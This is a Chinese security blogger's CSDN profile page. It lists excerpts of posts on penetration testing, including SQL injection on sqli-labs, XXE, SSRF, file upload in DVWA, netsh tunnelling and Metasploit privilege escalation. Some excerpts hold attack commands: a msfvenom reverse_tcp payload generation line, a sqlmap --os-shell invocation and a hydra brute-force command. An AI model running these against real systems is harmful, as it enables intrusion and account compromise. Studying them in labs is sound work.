hsxiaowu
码龄4年
关注
提问 私信
  • 博客:31,512
    31,512
    总访问量
  • 21
    原创
  • 558,050
    排名
  • 9
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:重庆市
  • 加入CSDN时间: 2020-10-23
博客简介:

m0_51822230的博客

查看详细资料
个人成就
  • 获得14次点赞
  • 内容获得6次评论
  • 获得146次收藏
创作历程
  • 23篇
    2021年
成就勋章
TA的专栏
  • 内网
    1篇
  • web漏洞
    11篇
  • app
    1篇
  • 提权
    1篇
  • 渗透测试工具使用
  • dvwa
    1篇
  • 安全设备
  • 网络协议
    4篇
  • linux
    1篇
兴趣领域 设置
  • 大数据
    mysql
  • 前端
    javascriptxhtml
  • 网络与通信
    https
  • 运维
    网络
  • 网络空间安全
    安全系统安全web安全安全架构
  • 服务器
    linuxcentos
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

WiredXDisplay_35464.apk

发布资源 2023.04.17 ·
apk

内网常用隧道笔记

netsh转发适用情况A主机可以访问B主机,B可以访问C主机,但A主机不能访问C主机。主机情况A主机有B主机的控制权限。B主机需要有ipv6才可以进行portproxy。没有防火墙进行流量拦截常用命令netsh interface portproxy add v4tov4 listenport=访问端口 listenaddress=监听ip connectaddress=转发ip connectport=转发端口netsh interface portproxy add
原创
发布博客 2021.11.27 ·
634 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

app测试基础篇

前言本文主要是app测试中常见工具的使用,都是报告上的东西主要是备忘,萌新笔记大佬轻喷。客户端应用测试一、数字签名验证:1.数字签名作用:①.签名就是app的身份,安卓系统只会接受有证书app的安装请求。②.当两个apk包名相同时,系统就会对以安装的apk进行覆盖,这时就需要两个apk的签名一致。总的来说数字签名的作用就是为了让内容不被篡改。2.通用证书,第三方证书的不安全性:①如果攻击者拿到了开发者的签名证书,就可以直接替换掉原apk的内容。恶意app会被当做正常app被下载。3.利用
原创
发布博客 2021.11.27 ·
2877 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

MSF进行windows提权

主要思路1.拿到webshell2.上传大马3.利用meterpreter模块生成payload4.本地进行监听5.进行提权6.进行维权7.生成新用户,连接3389一、本地监听端口①.生成payloadmsfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe②.上传123.exe这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可)③.m
原创
发布博客 2021.05.25 ·
743 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

sqlmap提权

mysql提权一.os-shell提权建立os-shell前提条件:①必须要有dba权限②secure_file_priv必须为空,不然无法写入文件这是secure_file_priv为null的情况下这是secure_file_priv为空的情况下③知道网站的绝对路径1、首先查看当前用户权限,是dba后进行os-shell建立2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell在这里选择网页语言,根据网页
原创
发布博客 2021.05.17 ·
4587 阅读 ·
3 点赞 ·
0 评论 ·
19 收藏

JSON劫持

【技术工场】“JSON劫持漏洞”分析2019-05-29 17:30 // 转载前 言JSON(Java Object Notation) 是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器解析和生成。JSON采用完全独立于语言的文本格式,但是也使用了类似于C语言家族的习惯。这些特性使JSON成为理想的数据交换语言。这种纯文本的数据交互方式由于可以天然的在浏览器中使用,所以随着ajax和web业务的发展得到了广大的发展,但是如果这种交互的方式用来传递敏感的数据,并且传输的时
转载
发布博客 2021.04.25 ·
1509 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

业务逻辑漏洞之登录、支付漏洞、伪随机验证码、密码找回

登录漏洞原理因为http连接,或者是cookie和session验证不完全导致的任意用户登录的漏洞。漏洞利用1.暴力破解在http中,报文是以明文传输的。我们可以直接使用burp进行暴力破解。而对于https来讲密码一般是以密文来进行传输的,我们在这种情况下就不能直接爆破,而是要知道报文的加密类型,然后再intrude模块中进行选择。2.cookie脆弱性漏洞产生原因例如一个系统再源码中的cookie验证只是验证了有没有cookie,只要不为空就执行跳转,而没有对内容进行限制。这样就随便加一
原创
发布博客 2021.04.25 ·
723 阅读 ·
0 点赞 ·
1 评论 ·
2 收藏

业务逻辑漏洞之水平越权和垂直越权

越权漏洞原理浏览器对用户提交的数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能。越权漏洞被分为两类一类是水平越权,一类是垂直越权。水平越权 :用户在权限相同级别下的组,可以进行越权访问、修改、删除数据。垂直越权 :用户在不同权限下的组,可以进行高级别的权限使用。漏洞成因前端原因:只对页面进行更高权限的隐藏实际上并没有对后端的进行一个权限过滤,只是对前端进行隐藏。根据用户权限的判断,进行选择显示,但是功能点还是可以触发。正确的做法应该是用户权限与功能点进行绑定。
原创
发布博客 2021.04.23 ·
7005 阅读 ·
4 点赞 ·
0 评论 ·
23 收藏

文件下载漏洞

文件下载漏洞原理假如网页上有文件下载的一个功能点,但是没有对用户可下载文件类型进行一个限制,就会构成问价下载的一个漏洞。利用条件:1.用户可控下载地址2.用户知道想要下载的文件路径,以及在哪个文件夹下3.服务端对下载文件没有限制注入点:1.url参数查找• download.php?path= • download.php?file= • down.php?file= • data.php?file= • readfile.php?file= • re
原创
发布博客 2021.04.22 ·
198 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

命令执行及代码执行

命令执行及代码执行漏洞原理命令执行和代码执行漏洞是因为在代码中有进行执行的函数,但是有没有对用户可控数据进行过滤,所以形成了这个漏洞。命令执行常见函数。system:执行一个外部的应用程序并显示输出的结果。exec:执行一个外部的应用程序。shell_exec:执行shell命令并返回输出的结果的字符串。passthru:执行一个UNIX系统命令并显示原始的输出。popen():打开到命令参数中指定的程序的管道,如果发生错误,则返回false。proc_open: 执行一个命令,并且打开用
原创
发布博客 2021.04.20 ·
1463 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

XXE

XXE原理介绍XXE Injection即XML External Entity Injection。也就是外部实体注入攻击。漏洞是由在处理不安全的外部实体数据时造成的。在了解xxe漏洞之前我们需要对xml有所了解。xmlxml与html的区别为:xml是传输和储存数据的。html的作用是显示数据的。xml的结构是树结构,从根出发再到叶<?xml version="1.0" encoding="UTF-8"?> //表达版本和编码方式<note>
原创
发布博客 2021.04.20 ·
173 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

SSRF原理及bwapp小案例

原理ssrf(Server-Side Request Forgery:服务器端请求伪造)是通过由攻击者构造由服务端发送请求的漏洞。漏洞危害漏洞利用点利用方法修复方案bwapp ssrf可以看到我们这里有3个实验1.文件包含进行端口扫描2.xxe获取敏感内容文件包含进行端口扫描我们先来看一看端口扫描的源代码<?php/*bWAPP, or a buggy web application, is a free and open source deliberately ins
原创
发布博客 2021.04.14 ·
607 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

PHP反序列化

引用文章大佬写的,建议直接看他的 作者:KeefePHP反序列化和序列化方法php用serialize和unserialize着两个函数进行序列化和反序列化序列化的含义为:将类与对象转换为可以存储的值,可以储存在任何地方,而且不会破坏类型和结构。反序列化的含义为:将字符串转化为php值。魔术函数触发条件__construct 当一个对象创建时被调用,__destruct 当一个对象销毁时被调用,__toString 当一个对象被当作一个字符串被调用。__wakeup()
原创
发布博客 2021.04.08 ·
186 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

信息收集工具使用

masscan端口信息搜集masscan -p 0-65535 ipaddress --rate 10000nampnmap -A -sC -p 443,80,23,21,3306,3309,53,5040hydrahydra -L username.txt -P password.txt mysql://ipadress
原创
发布博客 2021.04.22 ·
233 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

dvwa中的文件上传模块解析

文件上传原理原理:文件上传就是对服务端上传文件,因服务端对文件类型过滤不严格导致恶意文件被解析,导致服务端的权限泄露。文件上传的条件:1.可以上传文件2.上传的文件可以被服务器解析3.可以找到上传文件的路径dvwa练习LOW我们先看看low级别的代码1.首先使用isset()函数进行变量测试们是否点击了upload2.然后进行一个变量上传路径的定义。用.=进行连续变量定义。3.对文件是否上传到临时目录进行判断从源代码我们可以看出并没有对上传文件进行任何过滤我们直接上传一个一句话&l
原创
发布博客 2021.04.02 ·
318 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

最全的SQL注入总结(转载)

转载至:最全的SQL注入总结SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sqlite、postgersqlnosql:mongodb、redi
转载
发布博客 2021.02.18 ·
1764 阅读 ·
4 点赞 ·
0 评论 ·
72 收藏

post 基于错误的注入 sqli-lab

get注入与post注入区别get注入可以直接在URL上进行传输参数。post注入是基于输入框进行注入,所以得使用辅助工具进行注入。post注入的两个前提:1.输入框可以交互2.输入的语句会进入到数据库进行信息查找下面我们用sqli-lab less11来举一个例子less11首先我们使用brupsuite进行信息拦截。这里我们得到了发给web的http请求。我们把这条信息发送到repeater上进行注入。我们可以先对sql语句进行判断。select uname,passwd form
原创
发布博客 2021.02.17 ·
184 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

修改secure_file_priv的值后,仍然没有生效。

我的之前的问题是使用phpstudy后,它在自己的安装目录下生成了一个my.ini(在安装phpstuay前系统里就存在mysql)。改了这个文件以后仍然没有生效,后来才发现是要在原mysql路径下修改my.ini才可以成功。希望能对使用phpstudy的用户产生一点帮助。...
原创
发布博客 2021.02.15 ·
1405 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

sql注入基于字符型和数字型

less1他这里是让我们插入一个id值我们写入http://192.168.88.145/sqli/Less-1/?id=1依次测试到15,发现id=15页面不再输出信息。可得数据库id只写到14。我们对报错信息进行解析:‘‘14’’ LIMIT 0,1’剔除一对单引号‘14’’ LIMIT 0,1剔除我们输入的内容‘’ LIMIT 0,1这里我们可以猜测sql语句内容select Login_name,Pssword from table where ‘id=14’ limit
原创
发布博客 2021.02.15 ·
554 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

linux基础命令

查看网卡命令ifconfigeno表示一块网卡 flags使网络设备的状态标识符 最大传输单元1500字节inet为网卡地址 掩码24位 广播地址为192.168.126.255lo表示环回网卡,一般用于测试网络程序,可以不让局域网和外网用户看到,只在本机上运行和观察所用接口。1.网卡开关命令ifconfig <网卡名称> up/down2.设置最大传输单元ifconfig eno mtu xx3.配置IP地址ifconfig eno x.x.x.x用户命令
原创
发布博客 2021.02.10 ·
158 阅读 ·
0 点赞 ·
2 评论 ·
0 收藏
加载更多